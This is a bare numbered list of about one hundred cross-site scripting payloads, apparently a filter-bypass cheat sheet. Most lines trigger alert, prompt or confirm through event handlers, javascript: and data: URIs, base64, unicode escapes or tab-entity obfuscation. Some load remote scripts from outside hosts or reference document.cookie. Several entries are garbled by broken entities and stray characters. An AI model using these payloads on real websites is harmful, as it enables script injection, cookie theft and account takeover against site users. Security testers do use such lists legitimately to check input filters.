[1] <iframe %00 src="	javascript:prompt(1)	"%00>
[2] <svg><style>{font-family:'<iframe/onload=confirm(1)>'
[3] <input/onmouseover="javaSCRIPT:confirm(1)"
[4] <sVg><scRipt %00>alert(1) {Opera}
[5] <img/src=`%00` onerror=this.onerror=confirm(1)" />
[6] <form><isindex formaction="javascript:confirm(1)"
[7] <img src=`%00`
 onerror=alert(1)

[8] <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
[9] <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
[10] <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEp Pg==">
[11] <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
[12] "><h1/onmouseover='\u0061lert(1)'>%00
[13] <iframe/src="data:text/html,<svg onload=alert(1)>">
[14] <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
[15] <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
[16] <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
[17] <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
[18] <iframe src=javascript:alert(document.lo cation)>
[19] <form><a href="javascript:\u0061lert(1)">X
[20] </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
[21] <img/ � src=`~` onerror=prompt(1)>
[22] <form><iframe � src="javascript:alert(1)"� ;>
[23] <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgx KTwvc2NyaXB0Pg==" �>X</a
[24] http://www.google<script .com>alert(document.location)</script
[25] <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
[26] <img/src=@
onerror = prompt('1')
[27] <style/onload=prompt('XSS')
[28] <script ^__^>alert(String.fromCharCode(49))</script ^__^
[29] </style ><script :-(>/**/alert(document.location)/**/</script :-(
30] �</form><input type="date" onfocus="alert(1)">
[31] <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1 9;'>
[32] <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF1 1\u1450')/***/</script /***/
[33] <iframe srcdoc='<body onload=prompt(1)>'>
[34] <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
> X</a>
[35] <script ~~~>alert(0%0)</script ~~~>
[36] <style/onload=<!-- > alert (1)>
[37] <///style///><span %2F onmousemove='alert(1)'>SPAN
[38] <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
[39] "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
[40]
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
[41] <marquee onstart='javascript:alert(1)'>^__^
[42] <div/style="width:expression(confirm(1))">X</div> {IE7}
[43] <iframe/%00/ src=javaSCRIPT:alert(1)
[44] //<form/action=javascript:alert(document. cookie)><input/type='submit'>//
[45] /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
[46] //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
[47] </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
[48] <a/href="javascript:
javascriptrompt(1)"><input type="X">
[49] </plaintext\></|\><plaintext/onmouseover=prompt(1)
[50] </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1&# x29; {Opera}
[51] <a href="javascript:\u0061le%72t( 1)"><button>
[52] <div onmouseover='alert(1)'>DIV</div>
[53] <iframe style="position:absolute;top:0;left:0;width:100%;h eight:100%" onmouseover="prompt(1)">
[54] <a href="jAvAsCrIpT:alert(1)">X</a>
[55] <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
[56] <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
[57] <var onmouseover="prompt(1)">On Mouse Over</var>
[58] <a href=javascript:alert(document.c ookie)>Click Here</a>
[59] <img src="/" =_=" title="onerror='prompt(1)'">
[60] <%<!--'%><script>alert(1);</script -->
[61] <script src="data:text/javascript,alert(1)"></script>
[62] <iframe/src \/\/onload = prompt(1)
[63] <iframe/onreadystatechange=alert(1)
[64] <svg/onload=alert(1)
[65] <input value=<><iframe/src=javascript:confirm(1)
[66] <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
[67] http://www.<script>alert(1)</script .com
[68] <iframe src=j
	a
		v
& Tab;		a
				s&NewL ine;					c
		& Tab;			r
				& Tab;		i
					& Tab;		p
					& Tab;			t
				& Tab;					:a
&Tab ;									&Tab ;l
							&Tab ;				e
			&Tab ;									r&Ne wLine;								&Tab ;					t
		&Tab ;									&Tab ;		28
					&Ta b;									&Ta b;1
							&Ta b;									%29 ></iframe>
[69] <svg><script ?>alert(1)
[70] <iframe src=j	a	v	a	s	c	r	i&Ta b;p	t	:a	l	e	r	t	%28&T ab;1	%29></iframe>
[71] <img src=`xx:xx`onerror=alert(1)>
[72] <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
[73] <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
[74] <math><a xlink:href="//jsfiddle.net/t846h/">click
[75] <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
[76] <svg contentScriptType=text/vbs><script>MsgBox+1
[77] <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
[78] <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074( '\u0061') worksinIE>
[79] <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
[80] <script/src="data:text%2Fj\u0061v\u0061script,\u0061 lert('\u0061')"></script a=\u0061 & /=%2F
[81] <script/src=data:text/j\u0061v\u0061script,\u0061 %6C%65%72%74(/XSS/)></script
[82] <object data=javascript:\u0061le%72t(1)>
[83] <script>+-+-1-+-+alert(1)</script>
[84] <body/onload=<!-->
alert(1)>
[85] <script itworksinallbrowsers>/*<script* */alert(1)</script
[86] <img src ?itworksonchrome?\/onerror = alert(1)
[87] <svg><script>//
confirm(1);</script </svg>
[88] <svg><script onlypossibleinopera:-)> alert(1)
[89] <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
[90] <script x> alert(1) </script 1=2
[91] <div/onmouseover='alert(1)'> style="x:">
[92] <--`<img/src=` onerror=alert(1)> --!>
[93] <script/src=data:text/javascrip& #x074,alert (1)></script>
[94] <div style="position:absolute;top:0;left:0;width:100%;h eight:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
[95] "><img src=x onerror=window.open('https://www.google.com/');>
[96] <form><button formaction=javascript:alert(1)>CLICKME
[97] <math><a xlink:href="//jsfiddle.net/t846h/">click
[98] <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
[99] <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31 %29%3C%2F%73%63%72%69%70%74%3E"></iframe>
[100] <a href="data:text/html;blabla,<script & #115rc="http:/& #47sternefam 05ly.net/foo .js"></scri& #112t>​">Click Me</a>
